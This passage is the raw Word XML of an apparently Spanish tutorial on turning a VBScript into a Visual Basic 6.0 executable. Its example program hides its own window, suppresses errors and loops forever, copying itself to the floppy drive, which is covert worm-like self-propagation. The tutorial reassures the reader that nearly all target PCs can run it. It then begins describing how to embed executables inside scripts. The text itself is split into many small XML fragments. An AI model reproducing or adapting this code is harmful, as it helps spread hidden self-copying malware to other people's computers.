          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ".\archivo.vbs", "a:\archivo.vbs" bucle = 0 End If Loop</w:t>
      </w:r>
    </w:p>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reo que queda claro que hace y no hay que explicar nada sobre el script. Bueno, ahora solo nos hace falta </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>conseguir el Visual Basic 6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, esto va ser un poco difícil porque es un programa shareware, podéis coger una versión trial de la página web de Microsoft...</w:t>
      </w:r>
    </w:p>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uando lo consigas, instálalo y ábrelo. No te asustes si ves mucha cosa, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no es necesario saber nada de Visual Basic</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, sólo necesitas tener un poco de imaginación para crear un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Bueno,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sigue los siguientes pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="10"/>
        <w:ind w:hanging="140"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Abrimos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el Visual Basic 6.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="10"/>
        <w:ind w:hanging="14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nuevo proyecto a crear será un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>exe estandar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, esto creará un Formulario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="270"/>
        <w:ind w:hanging="140"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Veamos el código del formulario (boton derecho en el recuadro, ver código)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. - </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Borremos todo lo que hay y escribamos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo siguiente:</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Private Sub Form_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Load(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="266"/>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Me.Visible</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>=False</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>‘ Se</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> trata de copiar el script justo aquí…</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Unload Me</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End Sub</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stos comandos son los que</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacen que se ejecute un código al principio de nuestro programa</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, en este caso se ejecutará nuestro VBScript, expuesto anteriormente. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Entre esos dos comandos peguemos el código VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que quieres que se ejecute, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realizando las modificaciones pertinentes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que se copie como .exe y no como .vbs (recuerda que tu .vbs cuando se compile será .exe). Puedes seguir el ejemplo siguiente:</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Private Sub Form_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Load(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</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Me.Visible</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>=False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>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lastRenderedPageBreak/>
        <w:t>On Error Resume Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>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 xml:space="preserve">Set fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Scripting.FileSystemObject")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>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Do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>
        <w:ind w:left="71" w:right="6347"/>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bucle= bucle + 1 If bucle = 90000 Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>
        <w:ind w:left="71" w:right="3929"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.CopyFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ".\archivo.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", "a:\archivo.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">" bucle = 0 End If </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>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Loop</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Unload Me</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End Sub</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hora vamos al </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>menú superior</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Visual Basic 6.0 y hacemos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> clic en "Archivo" </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y se desplegará un menú, hacemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>clic en "Crear Proyecto1.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y nos saldrá un menú para guardar nuestro VBScript convertido en exe. Podemos hacer </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>clic sobre "Opciones”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para cambiar el icono del proyecto y cuatro tonterías más. Finalmente le damos a guardar y ya esta…</w:t>
      </w:r>
    </w:p>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sí de sencillo es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>compilar nuestro VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Además de eso, si te enseñas a usarlo un poquito, podrás personalizar tu .exe de muchas formas. Por otro lado, queda probado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te decides a aprender Visual Basic 6, todo lo que has aprendido de VBScript te servirá (y mucho).</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Cosas a tener en cuenta:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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ntencia </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Do...Loop Until x = 0</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VB6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se escribe como </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Do Until x = </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="806"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>0...Loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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No existe la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="301"/>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ambién </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es necesario que el archivo Msvbvm60.dll exista en el ordenador</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero esto no lo consideres un impedimento ya que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el 90 % de las PCs tienen instalados programas que usan esa librería (P.Ej. el Office 2003)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y no he encontrado un ordenador sin ésta. Si en cambio vas a personalizar tu .exe con alguna cosa, tendrás que instalarte las dll de Visual Basic (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Runtime Files of Visual Basic 6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) y ponerlas en la misma carpeta que tu exe siempre.</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cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5398770" cy="5080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="124279" name="Group 124279"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398770" cy="5080"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398770" cy="5080"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="134326" name="Shape 134326"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5398770" cy="9144"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5398770" h="9144">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5398770" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5398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279" style="width:425.1pt;height:0.400024pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53987,50">
                <v:shape id="Shape 134327" style="position:absolute;width:53987;height:91;left:0;top:0;" coordsize="5398770,9144" path="m0,0l5398770,0l5398770,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Hemos visto como crear un de tu vbs y exe, pero también es posible crear exe’s desde tu vbs, es decir, escribir exe’s desde un vbs (obviamente exe’s que ya estén hechos y tu quieras incluir en tu vbs). Pues bien, como se ha visto, tenemos un motor de comandos llamado WScript que ejecuta todos los scripts que le indiquemos, pero realmente, es cierto que con VBscript no se puede hacer todo lo que un programador experto querría, de echo, no puede hacer casi nada. La solución más común para programadores es: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>incluye tus ejecutables en un Script</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
